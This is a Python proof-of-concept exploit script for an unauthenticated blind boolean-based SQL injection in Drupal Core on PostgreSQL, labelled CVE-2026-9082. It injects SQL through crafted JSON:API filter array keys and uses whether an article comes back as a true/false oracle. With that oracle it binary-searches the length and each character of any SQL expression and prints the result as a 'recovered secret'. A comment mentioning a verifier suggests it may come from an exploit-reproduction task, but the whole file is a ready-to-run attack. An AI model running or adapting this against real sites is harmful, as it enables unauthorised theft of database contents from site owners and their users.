#!/usr/bin/env python3
"""
CVE-2026-9082 blind boolean-based SQL injection extractor (Drupal Core / PostgreSQL).

The PostgreSQL EntityQuery Condition::translateCondition() builds PDO named
placeholders from attacker-controlled array keys in
    filter[t][condition][value][<KEY>]
A key beginning with ')' truncates the placeholder name at that character; the
remainder of the key becomes literal SQL injected into the entity query. We use a
key of the form

    1))/**/AND/**/(<PRED>)/**/AND/**/((1=1

which, given values [0]=<seed title>, [1]=x and this malicious key, yields a
syntactically balanced WHERE:

    ((LOWER(title) IN (LOWER(:t0),LOWER(:t1),LOWER(:t1)) AND (<PRED>) AND ((1=1))))

The base IN is TRUE (value[0] matches the seed article), so the article is
returned IFF <PRED> is TRUE. That gives a boolean oracle (1 data item = TRUE,
0 items = FALSE) which we use to binary-search each character of an arbitrary
scalar SQL expression. Unauthenticated; only the public JSON:API HTTP surface is
touched.
"""
import sys, json, urllib.request, urllib.error

# Positional command-line arguments, read once at import time. Indexing
# sys.argv directly means an IndexError is raised if fewer than three
# arguments are supplied.
BASE_URL = sys.argv[1].rstrip("/")  # site root with trailing slashes removed
BASE_TITLE = sys.argv[2]  # sent as value[0] of the title IN filter
SQL = sys.argv[3]  # scalar SQL expression whose text result is recovered

# JSON:API collection URL that every oracle request is sent to.
ENDPOINT = BASE_URL + "/jsonapi/node/article"


# RFC 3986 "unreserved" characters, as byte values. Membership is tested on
# bytes so that only genuine ASCII letters/digits are ever passed through.
_UNRESERVED = frozenset(
    b"ABCDEFGHIJKLMNOPQRSTUVWXYZ"
    b"abcdefghijklmnopqrstuvwxyz"
    b"0123456789-_.~"
)


def pct(s: str) -> str:
    """Percent-encode every byte of *s* that is not an RFC 3986 unreserved character.

    The string is encoded as UTF-8 and each byte is either kept (ASCII
    letters, digits and ``-_.~``) or written as ``%XX`` with upper-case hex.

    Checking ``chr(b).isalnum()`` would be wrong here: bytes >= 0x80 map to
    Latin-1 characters such as 'Ã' (0xC3) that count as alphanumeric and
    would leak into the output unencoded, so the test is made against an
    explicit ASCII set instead. The result is therefore always pure ASCII.

    Args:
        s: Text to encode.

    Returns:
        The percent-encoded text; an empty string for empty input.
    """
    return "".join(
        chr(b) if b in _UNRESERVED else "%%%02X" % b
        for b in s.encode()
    )


def is_true(pred: str) -> bool:
    """Send one oracle request and report whether any item came back.

    Builds the filter query string around *pred*, issues a GET to ENDPOINT
    and parses the response body as JSON.

    Args:
        pred: Boolean expression text spliced into the filter key.

    Returns:
        True when the response's "data" member is non-empty, False when it
        is empty or missing.

    Raises:
        SystemExit: if the server answers with an HTTP error status; the
            message carries the status code, the predicate and the first
            300 characters of the response body.

    Only urllib.error.HTTPError is caught here, so other failures (for
    example connection errors or a body that is not valid JSON) propagate
    to the caller unchanged.
    """
    inj = "1))/**/AND/**/(" + pred + ")/**/AND/**/((1=1"
    # (name, value) pairs. Names are sent as written -- only the injected key
    # segment is pre-encoded with pct() -- while every value is encoded when
    # the query string is joined below.
    params = [
        ("filter[t][condition][path]", "title"),
        ("filter[t][condition][operator]", "IN"),
        ("filter[t][condition][value][0]", BASE_TITLE),
        ("filter[t][condition][value][1]", "x"),
        ("filter[t][condition][value][" + pct(inj) + "]", "zzz"),
    ]
    qs = "&".join(n + "=" + pct(v) for n, v in params)
    url = ENDPOINT + "?" + qs
    try:
        # 60-second timeout per request; the body is decoded leniently so
        # invalid UTF-8 cannot raise before JSON parsing.
        with urllib.request.urlopen(url, timeout=60) as r:
            d = json.loads(r.read().decode("utf-8", "replace"))
    except urllib.error.HTTPError as e:
        body = e.read().decode("utf-8", "replace")
        # A 500 here means our predicate broke SQL syntax — surface it loudly.
        raise SystemExit("ERROR: HTTP %d from oracle (predicate=%r): %s"
                         % (e.code, pred, body[:300]))
    # Non-empty "data" is the TRUE signal; a missing key counts as FALSE.
    return len(d.get("data", [])) > 0


def find_length(expr: str, cap: int = 4096) -> int:
    """Binary-search the length of *expr*'s value using the boolean oracle.

    A first probe checks that the length is greater than zero; after that
    the interval [1, cap] is halved with "length > probe" questions until a
    single candidate remains.

    Args:
        expr: SQL expression text whose result length is wanted.
        cap: Upper bound of the search interval. A value longer than this is
            reported as exactly ``cap``.

    Returns:
        The recovered length, between 1 and ``cap`` inclusive.

    Raises:
        SystemExit: if the initial "length > 0" probe is not answered TRUE.
    """
    length_sql = "(SELECT length((%s)))" % expr

    # Sanity probe: the oracle must answer TRUE for a non-empty value.
    if not is_true("%s>0" % length_sql):
        raise SystemExit("ERROR: expression yields NULL/empty or oracle not firing: %s" % expr)

    low, high = 1, cap
    while low < high:
        probe = (low + high) // 2
        if is_true("%s>%d" % (length_sql, probe)):
            low = probe + 1  # length is strictly greater than probe
        else:
            high = probe  # length is at most probe
    return low


def extract_char(expr: str, pos: int) -> str:
    """Recover the character at 1-based position *pos* of *expr*'s value.

    Binary-searches the interval [0, 127] with "code > pivot" questions put
    to the oracle. The interval is fixed, so a code reported as greater than
    every pivot resolves to 127.

    Args:
        expr: SQL expression text being read.
        pos: 1-based character position within the value.

    Returns:
        A one-character string for the code the search converged on.
    """
    code_sql = "(SELECT ascii(substring((%s) FROM %d FOR 1)))" % (expr, pos)

    floor, ceiling = 0, 127
    while floor < ceiling:
        pivot = (floor + ceiling) // 2
        if is_true("%s>%d" % (code_sql, pivot)):
            floor = pivot + 1  # code is strictly greater than pivot
        else:
            ceiling = pivot  # code is at most pivot
    return chr(floor)


def main():
    """Recover the value of SQL one character at a time and print it.

    Progress goes to stderr: the target, the expression, the recovered
    length, then a carriage-return-refreshed line showing the text so far.
    The final result is written to stdout as a single
    ``RECOVERED_SECRET=<value>`` line.
    """
    log = sys.stderr.write

    log("[*] Target: %s\n" % ENDPOINT)
    log("[*] Extracting via boolean-blind SQLi: %s\n" % SQL)

    total = find_length(SQL)
    log("[*] Recovered length: %d\n" % total)

    recovered = ""
    for index in range(1, total + 1):
        recovered += extract_char(SQL, index)
        # "\r" rewrites the same terminal line; flush so it shows immediately.
        log("\r[*] %d/%d: %s" % (index, total, recovered))
        sys.stderr.flush()
    log("\n")

    # Clearly labeled stdout line for the verifier to capture.
    print("RECOVERED_SECRET=" + recovered)


# Run the extraction only when the file is executed as a script.
if __name__ == "__main__":
    main()
